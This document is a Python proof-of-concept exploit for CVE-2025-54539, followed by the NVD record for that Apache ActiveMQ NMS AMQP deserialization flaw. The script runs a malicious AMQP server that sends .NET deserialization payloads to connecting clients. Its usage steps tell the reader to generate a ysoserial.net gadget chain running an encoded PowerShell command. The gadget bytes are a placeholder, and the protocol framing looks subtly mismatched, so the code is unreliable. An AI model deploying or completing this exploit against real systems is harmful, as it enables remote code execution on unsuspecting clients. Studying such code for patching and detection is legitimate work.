CVE-2025-54539

# CVE-2025-54539 PoC - Apache ActiveMQ NMS AMQP Deserialization RCE # This PoC demonstrates the exploitation of the deserialization vulnerability # in Apache ActiveMQ NMS AMQP Client <= 2.3.0 import socket import struct import sys # AMQP Protocol Header (simplified) AMQP_HEADER = b'AMQP\x00\x01\x00\x00' def create_malicious_response(payload): """ Create a malicious AMQP response containing a .NET deserialization payload. The payload should be a BinaryFormatter serialized object with a gadget chain that leads to RCE (e.g., using ysoserial.net generated payload). """ # AMQP frame structure: frame-type, channel, size, payload, end-marker frame_type = 0x01 # Method frame channel = 0x00 # Construct AMQP method frame with malicious serialized data method_payload = payload frame_size = len(method_payload) + 4 # including class-id and method-id frame = struct.pack('>BHI', frame_type, channel, frame_size) frame += method_payload frame += b'\xCE' # frame end marker return frame def generate_gadget_payload(command): """ Generate a .NET deserialization gadget chain payload. In a real exploit, use ysoserial.net to generate this: ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "<command>" """ # Placeholder for actual .NET BinaryFormatter gadget chain # Replace with actual payload generated by ysoserial.net # Example: TypeConfuseDelegate, ObjectDataProvider, WindowsClaimsIdentity, etc. placeholder_payload = b'\\x00\\x01\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x01\\x00\\x00\\x00' return placeholder_payload def run_malicious_server(host='0.0.0.0', port=5672, command='calc.exe'): """ Run a fake malicious AMQP server that exploits CVE-2025-54539. """ server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server_socket.bind((host, port)) server_socket.listen(1) print(f"[*] Malicious AMQP server listening on {host}:{port}") print(f"[*] Command to execute: {command}") while True: client_socket, addr = server_socket.accept() print(f"[+] Client connected from {addr}") # Send AMQP protocol header client_socket.send(AMQP_HEADER) # Receive client's connection.start data = client_socket.recv(4096) print(f"[*] Received client data: {len(data)} bytes") # Send malicious response with deserialization payload gadget = generate_gadget_payload(command) malicious_frame = create_malicious_response(gadget) client_socket.send(malicious_frame) print(f"[+] Sent malicious payload ({len(malicious_frame)} bytes)") print(f"[+] Exploit delivered! Check target for code execution.") client_socket.close() if __name__ == '__main__': cmd = sys.argv[1] if len(sys.argv) > 1 else 'calc.exe' run_malicious_server(command=cmd) # Usage: # 1. Generate actual payload with ysoserial.net: # ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "powershell -enc <base64_payload>" # 2. Replace placeholder_payload with the generated BinaryFormatter payload # 3. Run this script to start the malicious AMQP server # 4. Wait for vulnerable NMS AMQP Client to connect # 5. Code execution achieved on client side

{"cve": {"id": "CVE-2025-54539", "sourceIdentifier": "[email protected]", "published": "2025-10-16T09:15:34.680", "lastModified": "2025-11-04T22:16:28.940", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Deserialization of Untrusted Data vulnerability exists in the Apache ActiveMQ NMS AMQP Client.\n\nThis issue affects all versions of Apache ActiveMQ NMS AMQP up to and including 2.3.0, when establishing connections to untrusted AMQP servers. Malicious servers could exploit unbounded deserialization logic present in the client to craft responses that may lead to arbitrary code execution on the client side.\n\nAlthough version 2.1.0 introduced a mechanism to restrict deserialization via allow/deny lists, the protection was found to be bypassable under certain conditions.\n\nIn line with Microsoft’s deprecation of binary serialization in .NET 9, the project is evaluating the removal of .NET binary serialization support from the NMS API entirely in future releases.\n\nMitigation and Recommendations:\nUsers are strongly encouraged to upgrade to version 2.4.0 or later, which resolves the issue. Additionally, projects depending on NMS-AMQP should migrate away from .NET binary serialization as part of a long-term hardening strategy."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:activemq_nms_amqp:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.4.0", "matchCriteriaId": "933FFB4D-689A-4834-8733-EE9896BFCBD5"}]}]}], "references": [{"url": "https://lists.apache.org/thread/9k684j07ljrshy3hxwhj5m0xjmkz1g2n", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/10/15/3", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}